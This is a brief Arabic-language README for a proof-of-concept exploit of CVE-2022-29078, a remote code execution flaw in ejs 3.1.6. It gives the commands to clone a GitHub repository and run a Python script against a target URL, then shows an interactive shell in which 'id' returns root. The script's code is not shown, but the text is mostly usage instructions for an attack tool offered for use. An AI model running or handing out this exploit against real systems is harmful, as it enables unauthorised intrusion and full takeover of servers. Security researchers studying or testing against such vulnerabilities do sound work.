
إثبات مفهوم لاستغلال CVE-2022-29078 (ejs 3.1.6) يتيح تنفيذ الأوامر عن بُعد عبر سكربت بايثون. يقبل عنوان URL الهدف ويوفر قشرة تفاعلية.
PoC بسيط لـ CVE-2022-29078 (ثغرة ejs 3.1.6)
git clone https://github.com/chuckdu21/CVE-2022-29078.git
cd CVE-2022-29078
python3 CVE-2022-29078.py <URL>
سيظهر موجه لتنفيذ الأوامر
$ id
uid=0(root) gid=0(root) groupes=0(root)